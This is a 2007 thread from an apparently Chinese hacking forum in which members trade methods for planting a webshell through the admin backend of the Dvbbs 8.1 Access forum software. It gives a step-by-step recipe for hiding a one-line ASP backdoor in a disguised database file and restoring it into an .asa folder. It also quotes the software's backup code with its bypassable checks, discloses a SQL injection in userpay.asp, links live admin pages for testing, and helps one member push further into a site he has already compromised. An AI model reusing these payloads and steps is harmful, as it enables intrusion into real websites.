[讨论]动网8.1Access版后台how to get webshell?
文章作者:hackest信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
如题,恳请各位大大发表意见 把我的包子拿来我就告诉你 不骗你。 我找到办法了 等你换12星仗能打过我我就去研究。不骗你。 2003系统的话将上传的马马还原到"/XXX.asp/1.mdb"这样的路径下.2000系统的话就不知道了. 楼上,你说的这个方法,从楼主到2楼早在几周前就晓得了。你自己试下就晓得楼主为何问这个问题了。 楼上的楼上说的办法大概几个星期以前就知道了。 最好测试一下再来说 理论永远是理论 而且你能搞的出XXX.asp的目录? 8.1全部限制了 拜托 楼上的楼上的楼下,原创区你的贴我回了,去帮我解答下。
PS:那天之后你们2个龊男没有继续研究?那天吃饭回来的时候我跟EST说了可以用自己建立MDB的方法来避免因为8.1数据库做出的处理中出现的 <%<% 方法来绕过那个问题,你们试下,我这里没IIS,没程序,没有MDB编译程序。。。 <% loop <%
就这个东西阻止了
论坛里关于动易的那个类似的帖子看过了
感觉在实际应用的没什么意义
难道也要一个一个地去找怎么绕过?
[s:289] *** 作者被禁止或删除 内容自动屏蔽 *** [quote]引用第7楼hackest于2007-11-28 16:32发表的 :
<% loop <%
就这个东西阻止了
论坛里关于动易的那个类似的帖子看过了
感觉在实际应用的没什么意义
难道也要一个一个地去找怎么绕过?
.......[/quote]
那天俺说过,在DV的DB里写一句话会遇到<%<%的问题,那么我们就本地建立 mdb 文件,在数据库中新建立表 bink ,字段 bink ,内容写一句话,然后改mdb为gif文件传上去,再BAK为备份文件,这样一可以通过他备份的时候检测是否为DB文件,二可以绕过上传扩展名限制,三可以绕过他本身数据库中的 <%<% 。
当然我这个还只是理论,DV的系统从来没看过,你试下,有问题再回复,我们一起想办法。
PS:你丫拿12星我就删号! 这办法不行的
我在编辑部的时候上传的就是用一句话合并的空数据库文件
备份出来就直接无法访问了,不是试过了嘛
PS:12星杖我用上了,嘿嘿
PS2:征途 网通区 驰骋点兵
ID:hackest,欢迎来砍我啊,哈哈……
[s:264] 拜托。。。8.1呀。。。只让BAK为MDB。。。而且不可以建X.ASP的目录基本是没办法了。。。
然后唯一可以利用的地方就是可以查看目录下的文件,DV8.1本身应该没什么漏子了吧。。。 [s:270] 无法访问?
真怪事。。
等偶先去DOWN个8.1下来看代码,懒的黑盒搞了。。 本人最近也在研究这个问题,还是找不到优秀的解决方法,现在我就把我自己实践得出来的结论和大家讨论下吧!
1.dvbbs8.1.1论坛拿到shell方法我现在只能知道一种,但是这个办法局限性十分大,利用的情况是很小的,也就是通过BOKE上传项里添加PHP文件(或其他类型)后缀,可以直接传上去(前提是服务器支持PHP)
2.不能备份ASP后缀的文件夹以及不是MDB后缀的文件,不过可以备份ASA后缀的文件夹,正常情况下同样可以解析,可动网论坛备份的时候也不知道怎么搞的,只要备份文件就自动给你套上动网数据库的框架,也就是说备份出来的并不是你所认为的文件。上面的朋友说自己建个数据库编辑一句话,想想确实好象可以,但是实际上你备份出来的文件并不是你所想的那个结果。。
3.既然可以备份ASA后缀的文件价,我想先备份出一个ASA后缀的文件夹,然后去把上传目录设置成ASA后缀文件夹。。可是事实根本传不上去(理论上好象可以)。
4.再经过几次的实践中,发现动网那个数据库恢复根本就不可以使用,不管你怎么设置都会提示出错。。到目前为止我也想不出什么好的办法。。看来这次动网彻底要改头换脸了。。。
以上是个人见解,欢迎大家交流讨论。。 ,然后去把上传目录设置成ASA后缀文件夹。。可是事实根本传不上去(理论上好象可以)。
修改后是不能上传的 不过你可以把备份目录设置为 .asa这样在这个文件夹里的任何文件都会被解吸成ASP跟 .asp的原理是一样的 现在的问题是如何饶过数据库里的<% loop <% 不然任何东西都没用
至于添加个PHP那就不要说了。 早就知道了
PS:还有 不给包子就不告诉hackest 我跟BINK 知道怎么玩 就不告诉你 下回烫死你 莫非真的要本人动手?
谁有动网8.1系统,把以下相关文件按照目录格式打包扔下来一下,谢谢。
与文件备份相关的文件,包括该文件的 include 文件。 楼上莫说大话 你搞出来了大不了请你一顿包子 。 我看你咋把那个饶过去 我机器没有 自己去dvbbs下一个 [s:269] 对了,再给一个 8.1 网通线路的后台,我这里没IIS。 [code]
sub updata()
'On error resume next
Dim FileConnStr,Fileconn
Dim Tempbackpath
Dbpath="../"&db
'Dbpath=Replace(request.Form("Dbpath"),chr(0),"")
Dbpath=Server.mappath(Dbpath)
bkfolder=Replace(request.Form("bkfolder"),chr(0),"")
bkdbname=Replace(request.Form("bkdbname"),chr(0),"")
Tempbackpath = bkfolder& "/"& bkdbname
Rem Add By Dv.唧唧.Net 2007-10-15 [唧唧?谁?我还唧唧歪歪呢,靠! By Bink]
Rem Dbpath 原数据库文件绝对磁盘位置,Tempbackpath 目标数据库文件绝对磁盘位置。By Bink
If InStr(Lcase(Tempbackpath),".asp")>0 Or InStr(Lcase(Tempbackpath),".aspx")>0 Or InStr(Lcase(Tempbackpath),".php")>0 Then
'大哥,有点常识啊!我们家小帅都知道可以用 asa 了,我日,程序员怎么当的。
response.write "保存数据库名不合法,必须是有效的MDB文件和文件夹目录!"
Response.End
Exit Sub
End If
If Lcase(Mid(Tempbackpath,instrRev(Tempbackpath,".")+1))<>"mdb" Then
'写了等于白写。。。
response.write "保存数据库名不合法,必须是有效的MDB文件!"
Response.End
Exit Sub
End If
FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath
Set Fileconn = Dvbbs.iCreateObject("ADODB.Connection")
Fileconn.open FileConnStr
If Err Then
Response.Write Err.Description
Err.Clear
Set Fileconn = Nothing
ErrMsg = "备份的文件并非合法的数据库。"
dvbbs_error()
Exit Sub
Else
Set Fileconn = Nothing
End If
'这里就是传说中的检测数据库类型?捏哈哈哈~~~ 你大爷的。
Set Fso=Dvbbs.iCreateObject("scripting.filesystemobject")
If Fso.fileexists(dbpath) then
If CheckDir(bkfolder) = True Then
Fso.copyfile dbpath,Server.mappath(Tempbackpath)
Else
If MakeNewsDir(bkfolder) = True Then
Fso.copyfile dbpath,Server.mappath(Tempbackpath)
'直接过去了,多好。。。
Else
ErrMsg = "该目录"&bkfolder&"创建失败,请检查路径是否填写正确或手工创建后再进行备份。"
dvbbs_error()
End if
End if
Dv_suc("备份数据库成功,您备份的数据库路径为" &Tempbackpath)
Else
ErrMsg = "找不到您所需要备份的文件。"
dvbbs_error()
End if
end sub
[/code]
从代码上来看,完全就是可以用自己的MDB写一句话绕过去的,至于你们怎么没实现,我不晓得,反正是可以的,前面那帅哥说备份会自动加入DV框架?麻烦您先学好ASP吧。恩恩。
谁给我一个 8.1 后台!!!!!!!!我要测试!!!!!!!!! 理论永远是理论。 BINK同学 测试成功的话奖励包子一份 [s:266] 我坚信!可以。
一破洞网,整不掉他就怪了。。 我受不了了。没有 Microsoft Access 建立数据库。没有IIS 架设站点,用128的内存跑,网络还是网通的。
代码已经扔出来了,方法也说了,有点底子的人都知道怎么搞,我闪了。 备份出来的会无法访问的
13楼所提到我已掌握了
不过那不是本帖的关键了
那些限制性都比较大
所以才发帖讨论比较NB一点点的方法啊!
PS:Bink开我原来用的那台机,装2003系统再架个动网就试
[s:264] 帅锅,为了烂洞网值得俺去装个2003么?不鸟他了,我的方法已经在上面了,如果谁测试出现问题可以截图发上来。 你的方法是不可行的
除非能绕过<% loop <%
[s:263] 我不信,遗憾的是我这里么有条件去做一些测试工作。。
128的内存啊!!!!!!!! 因为备份出来的数据库还是带有<% loop <%
BINK你自己试下。 我用动网本身的库删掉<% loop <%
上传也还是不行 备份出来的还是原始 我在想能不能恢复再备份 恩,刚才在群里我也说了,这个可能是文件在上传的时候出现的,或者是在用FSO进行文件转移的时候出现的,至于这个的闭合到是有方法搞的,问题是我这里没有 Microsoft Access 软件。 恩 不是有人传你了么。 你想个办法搞定他 咱哥几个就属你ASP最精了 搞出来了下回吃包子不用你拿钱了 包子的事下次再议!
先把 8.1 装好,俺们开工咯。。 前两天刚刚帮人干掉一个了..还是老方法啊...正常文件尾部写入木马,然后就可以了...
高手都泡MM去了..答了两页也没人答出来,晕 [quote]引用第30楼dfsy于2007-11-30 10:26发表的 :
前两天刚刚帮人干掉一个了..还是老方法啊...正常文件尾部写入木马,然后就可以了...
高手都泡MM去了..答了两页也没人答出来,晕[/quote]
这里就属你最NB了,你实践了吗?自己下个下来研究下,就知道自己的话语是多么的苍白无力了。。 [quote]引用第30楼dfsy于2007-11-30 10:26发表的 :
前两天刚刚帮人干掉一个了..还是老方法啊...正常文件尾部写入木马,然后就可以了...
高手都泡MM去了..答了两页也没人答出来,晕[/quote]
鄙人不才,敢问阁下如何写入?!还请赐教! BAIN都发了,都是我的错,不该给LS发一个动网8.1 [s:264] 浪子,你确信你打的是我的名字? [s:267]
与 hackest 同求30楼高人如何拿SHELL,我们都很菜,只能用这样的笨办法,呵呵。 入侵过程都是靠这个嘛?
Template_CustomLabel.asp 给你们个测试用的.
网通
[url]http://bbs.geyan.com.cn/admin_login.asp[/url] 34楼上,汗,打错了,请你吃二份包包,请教30楼的,正常文件写入木马,(俺很菜,没理解错应该是一句话,),如何连上?PS:不要告诉俺备份 哎,我也最近好不容易搞了个DVBBS8。1 SQL版的 后台权限。可是救这WEBSHEL档了偶的路啊,我有方法想要的PM我! 我次了N个小时..用尽了我知道所有办法..结果...还是拿不到WEBSHELL 最近在看dvbbs8.1_ac版的代码,发现其中userpay..asp文件存在着注射漏洞,代码如下(从325行开始)
<%
End If
End Sub
'在线支付返回结果处理,不登陆也可执行
Sub AliPay_Return()
If Dvbbs.Forum_ChanSetting(5) <> "0" Then
AliPay_Return_Old()
Exit sub
Else
Dim Rs,Order_No,EnCodeStr,UserInMoney
Order_No=Request("out_trade_no")
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=3 And O_PayCode='"&Order_No&"'")
If not(Rs.Eof And Rs.Bof) Then
AliPay_Return_Old()
Exit sub
End if
Response.Clear
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=0 And O_PayCode='"&Order_No&"'")
If Rs.Eof And Rs.Bof Then
Response.Write "N"
Else
Response.Write "Y"
Dvbbs.Execute("Update Dv_ChanOrders Set O_IsSuc=3 Where O_ID = " & Rs("O_ID"))
End If
Response.End
End If
End Sub
Sub AliPay_Return_Old()
'得到和判断返回参数
Dim PayCode,SignStr,Success,UserInMoney
PayCode = Replace(Request("out_trade_no"),"'","")
Success = Request("is_success")
If PayCode = "" Or Success = "" Then
Response.redirect "showerr.asp?ErrCodes=<li>错误,非法的订单参数。&action=OtherErr"
Exit Sub
End If
If Success<>"T" Then
Response.redirect "showerr.asp?ErrCodes=<li>订单支付失败,请详细检查您的支付信息,<a href=""UserPay.asp"">重新进入支付页面</a>。&action=iOtherErr"
Exit Sub
End If
'验证订单信息
Dim Rs
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_PayCode='"&PayCode&"'")
If Rs.Eof And Rs.Bof Then
Response.redirect "showerr.asp?ErrCodes=<li>错误,找不到该订单信息或该订单已支付成功。&action=OtherErr"
Exit Sub [code]从代码上来看,完全就是可以用自己的MDB写一句话绕过去的,至于你们怎么没实现,我不晓得,反正是可以的[/code]
[color=#FF0000]的确有点断章取义了。不过……[/color]
我X。
你从理论上讲是可以的,我从理论上讲。网站要倒的……
我也去测试一下。
省的你说我%¥—……#的。
PS:你那个站把注册开起来吧` [s:269] [code]前两天刚刚帮人干掉一个了..还是老方法啊...正常文件尾部写入木马,然后就可以了...
高手都泡MM去了..答了两页也没人答出来,晕[/code]
难道是在一个正常的文件后加<%execute request("bink")%>这样?
我看见过动易ACE的是可以在一个正常文件后面加小马的代码。但是是php的。
这个理论有代商榷。 我也在自己网站上架了一个.搞了N久没搞下....网站给你们试试.别搞破坏
[url]http://www.738ld.cn/bbs/[/url]
默认用户名和密码. [color=#FF0066]一、本地建立数据库“Bink.mdb”
二、在数据库“Bink.mdb”中创建表“Bink”,并在表“Bink”中建立字段“Bink”,类型为文本型,属性默认。
三、在字段“Bink”中输入“<<%execute(request("bink"))%>>”。[这里为何这样?请看文章最后的注解]
四、保存并修改数据库文件名称为“Bink.txt”
五、前台论坛发新贴,并且上传该文件。
六、后台上传文件管理中找到最新上传的该文件地址,如“../UploadFile/2007-11/20071130015024861.txt”
七、打开数据库恢复功能,在备份文件位置处输入“../UploadFile/2007-11/20071130015024861.txt”并执行操作。
八、打开数据库备份功能,修改备份文件夹名为“bink.asa”,填写备份数据库名称为“bink.mdb”。
好了,你得到了一个地址为 [url]http://www.xxx.com/bink.asa/bink.mdb[/url] 的 Webshell。 [/color]
[color=#0000FF][size=7][size=5]这是BINK你的大作吧,你真会开玩笑,用伪造的数据库恢复后,正常的数据库被覆盖掉了,论坛都打不开了,显示数据库连接出错,还哪来的第八步,"数据库备份功能",我照你测试了下,结果把论坛给搞没了.[/size][/size][/color] 哈哈,楼上说得没错
最后一步实现不了的
PS:都怪我,那晚让他喝得太多了
[s:265] [quote]引用第38楼78306403于2007-12-14 15:00发表的 Re:[讨论]动网8.1Access版后台ho定w to get webshell? :
哎,我也最近好不容易搞了个DVBBS8。1 楼主hackest兄,我回了你的原创动网7.1的ODAY
有个问题麻烦解答下,谢谢楼主了
发现一个洞网有这个洞子问题如下
第一次更新成功。第2次插库应该成功了。但是后台始终无法登陆
试了很多方法。后来把前台的管理员的密码也update到我的油箱。运气不错跑出md5。但是还是无法登陆
后来猜想是1.后台是假的 2.将dv_admin表改了。
后来想利用一句话解决问题。
我想问下能否用这个洞子。片列目录。因为我手动post。从返回数据来看只要语法没错。是无法暴的,他都会显示200。成功执行。试了几个方法片列。都是返回正确。
想问问兄台有什么办法突破吗?搞到跟目录
小弟谢过了~ 是SQL版的话用注入点试试LOG备份咯
[s:265] 保留
Dv_Admin
Dv_TableList
Dv_User
这几个段
然后在第一个表里加入一句话
压缩后转换成97的数据库~~`
传上去先恢复后备份~~
页:
[1]
2